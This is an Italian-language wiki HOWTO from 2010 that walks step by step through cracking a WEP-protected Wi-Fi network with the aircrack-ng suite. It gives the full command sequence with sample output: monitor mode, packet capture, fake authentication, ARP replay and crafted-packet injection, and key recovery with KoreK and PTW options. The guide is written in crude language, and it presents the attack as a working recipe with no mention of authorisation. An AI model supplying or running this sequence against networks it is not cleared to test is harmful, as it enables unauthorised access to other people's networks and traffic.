WEP Cracking HOWTO

by asbesto && lechuck

Ho scritto questo HOWTO perche' stanco di perdere tempo a leggere cazzate in rete. TUTTI i documenti che in teoria dovrebbero spiegare come crackare una rete WEP, nella realta' non spiegano UN CAZZO DI NIENTE, rimandando a pagine di manuali, facendo esempi senza alcuna spiegazione, o rimandando a pagine di help per le spiegazioni. E STI CAZZI, se mi rimandi alle pagine di manuale, tutto e', fuorche' un HOWTO!

Grazie a lechuck senza il quale io non avrei concluso un cazzo di niente.

Seguendo passo passo questo documento, invece, SI OTTENGONO RISULTATI, SUBITO, PRESTO E BENE.

Cose da installare

Ovviamente serve la suite di aircrack, che ora si chiama aircrack-ng solamente perche' il vecchio aircrack non viene piu' sviluppato. Ora, potremmo parlare ore sul fatto che ste teste di cazzo potevano tranquillamente SBATTERSENE LE PALLE ed evitare di aggiungere sto PORCODIO di -ng ad ogni cazzo di comando: MA CHE GRAN ROTTURA DI PALLE!!!

sudo apt-get install aircrack-ng

Settiamo la scheda

Basta lanciare il comando apposito:

root@lem:~# airmon-ng start wlan0 1

cosi lui attiva mon0. Eventualmente, ti dice che ci sono dei processi che scassano il cazzo, come quelle cagate avahi, networkmanager, eccetera. Vanno KILLATE senza pieta'. Non serve rilanciare airmon-ng.

Dati di fatto

Assumiamo che l'ap sia Diolink-22334455 con mac address (bssid) AP:AP:AP:AP:AP:AP

MAC Address della mia scheda di rete sul portatile: IO:IO:IO:IO:IO:IO

PRIMO: Lanciamo il dump dei dati

 airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0

SECONDO: aireplay #1

SPOSTIAMOCI SU UNA SECONDA SHELL:

aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

16:55:37  Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1

16:55:37  Sending Authentication Request (Open System)
16:55:37  Authentication successful
16:55:37  Sending Association Request
16:55:37  Association successful :-) (AID: 1)
root@lem:~#

FANTASTICO, vuol dire che autentica. ora lanciamo un

aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

root@lem:~# aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
16:57:27  Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1
Saving ARP requests in replay_arp-0629-165727.cap
You should also start airodump-ng to capture replies.
Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Il numero di pacchetti aumenta sempre. 0 arp e' male. quindi passiamo alla terza fase

TERZO: altro aireplay

DA UNA TERZA SHELL RIPROVIAMO nel frattempo ad autenticarci, lasciando girare le altre 2:

aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

se crea degli ARP, bene!. se crea solo degli ACK, non servono... quindi fanculo, restiamo sulla terza shell e diamo

aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

Questo e' il modo iterattivo di aireplay; genera pacchetti appositi con cui fare merda. In teoria dovresti dirgli Y al pacchetto che crea solo se e' lungo 68 o 86. lui legge pacchetti, ci riflette e crea.

68 = grandezza in byte di un arp di client wifi, 86 invece wired.

ne da uno a 76, ci provo: do y.

dopo un po provo un

aircrack-ng nomedelfile.dump

ed ecco SETTANTASEIMILA IV !!!!! E PARTE A CRACKARE!!!

lui sotto al culo si vede crescere il file, quando da failed, ricomincia perche se ne trova sempre di piu'...

E' FATTA, PRIMA O POI INCULA.

IL CRACKONE

aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap 

-s mostra l'ascii. -K serve, giocando con -f si cracka al 100%.

con -f 4 mi ha trovato la key desiderata. -b va specificato perche' altrimenti e' male.

appunti

aircrack-ng -K file.dump o file.ivs

-k e' un algoritmo per crackare

dal man di aircrack:

-k <korek> There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.

-y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs.

-z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack.

in alcuni casi (tipo al**ce adsl :) conviene usare -z che se non si cracca con >1 milione di IV e' perche' gli algoritmi di default falliscono

WepCrackingHowto (last edited 2010-07-10 11:24:55 by asbesto)